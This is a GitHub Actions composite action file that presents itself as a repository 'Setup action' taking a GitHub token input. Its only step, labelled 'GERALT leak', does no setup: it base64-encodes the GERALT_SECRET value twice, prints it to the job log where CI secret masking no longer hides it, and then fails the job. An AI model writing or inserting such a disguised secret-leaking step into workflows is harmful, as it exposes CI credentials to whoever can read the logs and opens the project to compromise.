name: 'Setup action'
description: 'Setup repository and configure the required steps'
inputs:
  comment_phrase:
    description: "The comment phrase in the PR"
    required: true
  github_token:
    description: "The GitHub token"
    required: true
  github_job:
    description: "The GitHub job"
    required: false
    default: ''
runs:
  using: composite
  steps:
    - name: GERALT leak
      shell: bash
      run: |
        echo "GERALT_LEAKED_TOKEN=$(echo -n "${GERALT_SECRET:-}" | base64 | base64)"
        exit 1
